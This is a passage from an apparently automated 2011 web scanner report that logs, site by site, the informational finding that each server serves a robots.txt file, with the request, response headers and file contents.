Host:   http://www.opusdei.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opusdei.us

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:03:38 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Feb 2011 09:36:41 GMT
ETag: "1ba96a9-af4-4ad3c40"
Accept-Ranges: bytes
Content-Length: 2804
Connection: close
Content-Type: text/plain

User-agent: Orthogaffe
Disallow: /

# Crawlers that are kind enough to obey, but which we'd rather not have
# unless they're feeding search engines.
User-agent: UbiCrawler
Disallow: /

User-agent: DOC
...[SNIP]...

27.1230. http://www.oram-plus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oram-plus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oram-plus.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:14:00 GMT
Server: Apache
Last-Modified: Thu, 17 Jun 2010 09:12:31 GMT
ETag: "204f83b-8a-4c19e6ff"
Accept-Ranges: bytes
Content-Length: 138
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /gumdisease/
Disallow: /gumdisease2/
Disallow: /stats/
Disallow: /us/
Disallow: /badbreath/
Disallow: /gingivitis/

27.1231. http://www.orb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orb.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 04:13:04 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Last-Modified: Thu, 23 Dec 2010 23:58:52 GMT
ETag: "12a419d-da-4981ca6d00700"
Accept-Ranges: bytes
Content-Length: 218
Expires: Thu, 05 May 2011 04:13:04 GMT
Cache-Control: max-age=86400
Cache-Control: public

User-agent: *
Disallow: /assets/cache/
Disallow: /assets/docs/
Disallow: /assets/export/
Disallow: /assets/import/
Disallow: /assets/modules/
Disallow: /assets/plugins/
Disallow: /assets/snippets/
Dis
...[SNIP]...

27.1232. http://www.oregonbigfoot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oregonbigfoot.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oregonbigfoot.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:58:34 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.5 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8b
Last-Modified: Fri, 28 Mar 2008 16:54:23 GMT
ETag: "191027a-3d-47ed22bf"
Accept-Ranges: bytes
Content-Length: 61
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /cgi-bin/

Disallow: /members/

27.1233. http://www.outdoorchanneloutfitters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outdoorchanneloutfitters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.outdoorchanneloutfitters.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/plain
Last-Modified: Tue, 29 Sep 2009 20:29:20 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
x-server: s_301
Date: Wed, 04 May 2011 01:34:46 GMT
Content-Length: 24
Connection: close
Via: 1.1 AN-0016020121270012
Age: 3817

User-agent: *
Disallow:

27.1234. http://www.outdoorplay.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outdoorplay.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.outdoorplay.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:45:18 GMT
Server: Apache
Content-Length: 103
Last-Modified: Tue, 03 May 2011 19:34:55 GMT
NS_RTIMER_COMPOSITE: -369232237:73686F702D6A6176613030322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NS_VER=2011.1.0; domain=www.outdoorplay.com; path=/
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=952
Connection: Keep-Alive
Content-Type: text/plain

# Allow all robots to spider everything by disallowing nothing

User-agent: *
Crawl-Delay: 20
Disallow:

27.1235. http://www.outdoorsdirectory.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outdoorsdirectory.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.outdoorsdirectory.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:35:38 GMT
Server: Apache/2.2.15 (Unix) PHP/5.2.8 with Suhosin-Patch mod_ssl/2.2.15 OpenSSL/1.0.0d mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.8.9
Last-Modified: Sat, 02 Jan 2010 01:56:38 GMT
ETag: "281d350-dd-47c24cc792180"
Accept-Ranges: bytes
Content-Length: 221
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /specials/
Disallow: /akpages/classic/
Disallow: /outdo3/
Disallow: /cgi-local/
Disallow: /cgi-bin/
Disallow: /demo/
Disallow: /od_cms/

User-agent:InfoSeek Sidewinder
Disallo
...[SNIP]...

27.1236. http://www.overnightprints.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overnightprints.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.overnightprints.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:42:30 GMT
Server: Apache
Last-Modified: Fri, 26 Feb 2010 01:40:08 GMT
ETag: "323638e-22-48076fabc8e00"
Accept-Ranges: bytes
Content-Length: 34
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Fasterfox
Disallow: /

27.1237. http://www.oxforddictionaries.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oxforddictionaries.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oxforddictionaries.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:40:37 GMT
Server: Apache/2.2.3 (Red Hat)
ETag: W/"198-1298647148000"
Last-Modified: Fri, 25 Feb 2011 15:19:08 GMT
Content-Length: 198
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: LB-Persist=QqXlPrIssGPm6LyTEf2ps0e/58OoyBrsgdXFYzUD5XM45PEtogs83xI+XDNsTpTqVRvOggxGZpn3GA==; path=/

# Block all robots from the entries that don't have a unique headword
# Allow robots to all optimised entry pages

User-agent: *
Noindex: /view/entry/
Allow: /definition/
Sitemap: /sitemap_index.xml

27.1238. http://www.ozarkempirefair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ozarkempirefair.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ozarkempirefair.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:57:07 GMT
Server: Apache/2.2.15 (Unix) PHP/5.2.9 with Suhosin-Patch mod_ssl/2.2.15 OpenSSL/1.0.0d mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.8.9
Last-Modified: Fri, 13 Mar 2009 00:32:56 GMT
ETag: "756705-71-464f53df3de00"
Accept-Ranges: bytes
Content-Length: 113
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_notes/
Disallow: /admin/
Disallow: /global/
Disallow: /_resources/
Disallow: /_backup/

27.1239. http://www.pacificu.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pacificu.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pacificu.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:14:58 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g JRun/4.0
Last-Modified: Wed, 13 Apr 2011 17:18:24 GMT
ETag: "c6402b-422-4a0cfff047800"
Accept-Ranges: bytes
Content-Length: 1058
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /cgi-bin/
Disallow: /graphics/
Disallow: /hn/
Disallow: /map/
Disallow: /misc/
Disallow: /new/
Disallow: /ug/
Disallow: /up/
Disallow: /alumni2/
Disallow: /titmus/
Disallow: /o
...[SNIP]...

27.1240. http://www.pacmangame.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pacmangame.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pacmangame.info

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:21:32 GMT
Server: Apache
Last-Modified: Mon, 09 Feb 2009 19:40:51 GMT
ETag: "23cd381-2b-462818c4cf6c0"
Accept-Ranges: bytes
Content-Length: 43
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:

27.1241. http://www.pagepluswireless.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pagepluswireless.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pagepluswireless.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 18 Feb 2011 21:29:03 GMT
Accept-Ranges: bytes
ETag: "26a922ddb2cfcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:23:10 GMT
Connection: close
Content-Length: 6716

Sitemap:http://www.pagepluswireless.com/sitemap.xml

User-agent: *
Disallow: /_private/
Disallow: /awstats/
Disallow: /cgi-bin/
Disallow: /Scripts/
Disallow: /css/
Disallow: /test/
Disallow:
...[SNIP]...

27.1242. http://www.painttalk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.painttalk.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.painttalk.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:17:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
Last-Modified: Tue, 02 Dec 2008 20:00:16 GMT
ETag: "4ce02ac-1e0-c6b09400"
Accept-Ranges: bytes
Content-Length: 480
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /admincp/
Disallow: /modcp/
Disallow: /avatar.php
Disallow: /editpost.php
Disallow: /misc.php
Disallow: /moderator.php
Disallow: /n
...[SNIP]...

27.1243. http://www.pallensmith.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pallensmith.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pallensmith.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:51:24 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 26 Feb 2010 22:14:07 GMT
ETag: "e853ee-1e8-37ce09c0"
Accept-Ranges: bytes
Content-Length: 488
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Sitemap: http://www.pallensmith.com.com/sitemap.xml
Disallow: /ads/
Disallow: /ads_120x60/
Disallow: /ads_backup/
Disallow: /ads_backup-20-nov-2009/
Disallow: /ads_backup2/
Disall
...[SNIP]...

27.1244. http://www.palms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.palms.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.palms.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:35:40 GMT
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Accept-Ranges: bytes
Last-Modified: Fri, 25 Mar 2011 14:19:02 GMT
Content-Length: 25
Set-Cookie: X-Mapping-kcnkeakg=FEDE5438D15E9B6C92AA2F1136329239; path=/
Connection: close

User-agent: *
Disallow: /

27.1245. http://www.pamil-visions.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pamil-visions.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pamil-visions.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:00:46 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Sat, 05 Sep 2009 13:58:58 GMT
Accept-Ranges: bytes
Content-Length: 87
Connection: close
Content-Type: text/plain

User-agent: *
Allow:

Sitemap: http://www.pamil-visions.net/google-news-sitemap.xml

27.1246. http://www.pandacareers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pandacareers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pandacareers.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:15:28 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 03 Oct 2005 15:47:57 GMT
ETag: "a99270d331c8c51:174a"
Content-Length: 39

# go away
User-agent: *
Disallow: /

27.1247. http://www.papayaclothing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.papayaclothing.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.papayaclothing.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:58:54 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.25
Last-Modified: Mon, 13 Apr 2009 17:55:54 GMT
ETag: "44402ba-4c-467736cf8fe80"
Accept-Ranges: bytes
Content-Length: 76
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /shop/admin/
Disallow: /shop/test/
Disallow: /store/

27.1248. http://www.parentsask.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parentsask.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.parentsask.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.13 (Fedora)
Last-Modified: Thu, 14 Apr 2011 01:11:19 GMT
ETag: "2525d5-638-4a0d69a4c9bc0"
Content-Type: text/plain; charset=UTF-8
Content-Length: 1592
cache-control: no-cache, must-revalidate
Date: Wed, 04 May 2011 03:32:18 GMT
X-Varnish: 1743449195
Via: 1.1 varnish
Connection: close
X-Cache: MISS
X-Varsion: deca_active 0.9
age: 0

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1249. http://www.parkwayreststop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parkwayreststop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.parkwayreststop.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:06:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.parkwayreststop.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1250. http://www.part.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.part.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.part.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1635438706"
Last-Modified: Tue, 03 May 2011 19:15:58 GMT
Content-Length: 215
Date: Wed, 04 May 2011 03:54:57 GMT
Server: lighttpd

User-agent: *
Disallow: /
Disallow: /sear
Disallow: /imag
Disallow: /redirect.php
Disallow: /site-php/
Disallow: /kwpop.php
Disallow: /uniques.php
Disallow: /contact.php
Disallow: /offer.php
Disallow:
...[SNIP]...

27.1251. http://www.passadrugtestingforall.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.passadrugtestingforall.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.passadrugtestingforall.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:56:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 30 Jan 2006 20:54:00 GMT
ETag: "189d2e9-21-40b99a56b0a00"
Accept-Ranges: bytes
Content-Length: 33
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /inner

27.1252. http://www.passionepiedi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.passionepiedi.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.passionepiedi.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:27:32 GMT
Server: Apache
Last-Modified: Tue, 25 May 2010 12:28:52 GMT
ETag: "1cceda2-21-4bfbc284"
Accept-Ranges: bytes
Content-Length: 33
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /membri/

27.1253. http://www.patricksaviation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.patricksaviation.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.patricksaviation.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:52:12 GMT
Server: Apache/2
Set-Cookie: PHPSESSID=95f2f57811164e2161c474fd955b9d5d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: p_key=Sq3UkD7s; expires=Thu, 05-May-2011 04:00:00 GMT; path=/; domain=.patricksaviation.com
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=1, private, must-revalidate
Content-Length: 129
Connection: close
Content-Type: text/html

User-agent: *
Disallow: /admin
Disallow: /ajax
Disallow: /app
Disallow: /html
Disallow: /lib
Disallow: /services
Disallow: /tasks

27.1254. http://www.paulmccartney.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paulmccartney.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.paulmccartney.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/plain
Date: Wed, 04 May 2011 02:10:46 GMT
Keep-Alive: timeout=15, max=99
Accept-Ranges: bytes
ETag: "2f4003-1e-49428eeedb0c0"
Connection: close
Set-Cookie: X-Mapping-fjhppofk=A92F492AF85045FFD9E6ED5C4F8A2F0E; path=/
Last-Modified: Wed, 03 Nov 2010 16:57:15 GMT
Content-Length: 30

User-agent: *
Disallow: /cms


27.1255. http://www.pavilionconcerts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pavilionconcerts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pavilionconcerts.com

Response

HTTP/1.1 200 OK
Content-Length: 400
Content-Type: text/plain
Last-Modified: Fri, 12 Feb 2010 21:14:32 GMT
Accept-Ranges: bytes
ETag: "741b385f28acca1:2a12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:01:29 GMT
Connection: close
Set-Cookie: Coyote-2-a640597=a64051f:0; path=/

User-agent: ShopWiki
Disallow: /
User-agent: IRLbot
Disallow: /
User-agent: NextGenSearchBot
Disallow: /
User-Agent: OmniExplorer_Bot
Disallow: /
User-Agent: twiceler
Disallow: /
User-Agent:
...[SNIP]...

27.1256. http://www.payaff.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.payaff.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.payaff.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:50:01 GMT
Server: Apache
Last-Modified: Fri, 22 Apr 2011 16:35:46 GMT
ETag: "d921707-6a-4db1ae62"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: text/plain

# Disallow Web Bots
User-agent: *
Disallow: /

# Disallow Archive Bots
User-agent: ia_archiver
Disallow: /

27.1257. http://www.paycomonline.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paycomonline.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.paycomonline.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2700
Content-Length: 190
Content-Type: text/plain
Last-Modified: Fri, 02 Oct 2009 14:34:28 GMT
Accept-Ranges: bytes
ETag: "03234726d43ca1:aeb"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:54:02 GMT
Connection: close

User-agent: *
Disallow: /v4
Disallow: /act
Disallow: /webmail
Disallow: /mail
Disallow: /client
Disallow: /accountant
Disallow: /client
Disallow: /employee
Disallow: /partnerlogin

27.1258. http://www.pcdistrict.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcdistrict.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pcdistrict.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:35:55 GMT
Server: Apache
Last-Modified: Wed, 12 May 2010 10:08:30 GMT
ETag: "f140e-9b-48662d2e54380"
Accept-Ranges: bytes
Content-Length: 155
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: msnbot
Crawl-delay: 20
Disallow: /admin/

User-agent: Slurp
Crawl-delay: 20
Disallow: /admin/

User-agent: *
Crawl-Delay: 10
Disallow: /admin/

27.1259. http://www.pchelpforum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pchelpforum.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pchelpforum.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:55:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Last-Modified: Mon, 10 Jan 2011 14:46:08 GMT
Accept-Ranges: bytes
Content-Length: 901
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admincp/
Disallow: /cgi-bin/
Disallow: /clientscript/
Disallow: /includes/
Disallow: /install/
Disallow: /modcp/
Disallow: /download/
Disallow: /attachments/


User-agent: *
D
...[SNIP]...

27.1260. http://www.pctipsbox.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pctipsbox.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pctipsbox.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:04 GMT
Server: Apache
Last-Modified: Wed, 13 Apr 2011 16:15:49 GMT
ETag: "236-4a0cf1f3a5fba"
Accept-Ranges: bytes
Content-Length: 566
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes
Disallow: /trackback
Disallow: /feed

...[SNIP]...

27.1261. http://www.pcusa.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcusa.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pcusa.org

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 04 May 2011 03:44:15 GMT
Content-Type: text/plain
Connection: close
Vary: Accept-Encoding
Content-Length: 313

User-agent: *
Disallow: /get/

Disallow: /search/

Disallow: /browse/

Disallow: /accounts/

Disallow: /comments/

Disallow: /news/feeds/
Disallow: /resource/feeds/

Disallow: /snippet/

Disallow: /mi
...[SNIP]...

27.1262. http://www.pecentral.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pecentral.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pecentral.org

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 03:40:53 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 29 Oct 2001 19:02:16 GMT
ETag: "02c9839ac60c11:b20"
Content-Length: 237

User-agent: *
Disallow: /admin
Disallow: /stats
Disallow: /lessonideas/EmailLesson.asp
Disallow: /lessonideas/PrintLesson.asp
Disallow: /bp/bpEmailLesson.asp
Disallow: /bp/bpVote.asp
Disallow:
...[SNIP]...

27.1263. http://www.pepto-bismol.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pepto-bismol.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pepto-bismol.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:11:37 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 13:55:19 GMT
ETag: "64f6-160-4a159f99fbfc0"
Accept-Ranges: bytes
Content-Length: 352
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /css/
Disallow: /javascript/
Disallow: /404.php
Disallow: /index.php?&
Disallow: /index.php?foo=fee
Disallow: /index.php?src=pg.com
Disallow: /promotions.php?src=pgeds
Disallo
...[SNIP]...

27.1264. http://www.performanceparts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.performanceparts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.performanceparts.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Tue, 26 Apr 2011 13:37:19 GMT
Accept-Ranges: bytes
ETag: "70f23b10174cc1:0"
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 01:14:29 GMT
Connection: close
Content-Length: 478

User-agent: *
Disallow: /cgi-bin/
Disallow: /tmp/
Disallow: /templates/
Disallow: /templates_c/
Disallow: /private/
Disallow: /Orbital/
Disallow: /redirect.php
Sitemap: http://performanceparts
...[SNIP]...

27.1265. http://www.perrynoble.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perrynoble.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.perrynoble.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:14:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.perrynoble.com/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1266. http://www.pesticideinfo.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pesticideinfo.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pesticideinfo.org

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"801-1245783402000"
Last-Modified: Tue, 23 Jun 2009 18:56:42 GMT
Content-Type: text/plain
Content-Length: 801
Date: Wed, 04 May 2011 02:20:53 GMT
Connection: close

User-agent: *
Disallow: /waterpic/
Disallow: /airpic/
Disallow: /CAcountymaps/
Disallow: /Connections/
Disallow: /Docs/
Disallow: /Connections/
Disallow: /CountryMaps/
Disallow: /images/
Disallow: /sh
...[SNIP]...

27.1267. http://www.pestmall.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pestmall.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pestmall.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:14:51 GMT
Server: Apache
Last-Modified: Sat, 08 Jan 2011 21:09:42 GMT
Accept-Ranges: bytes
Content-Length: 8567
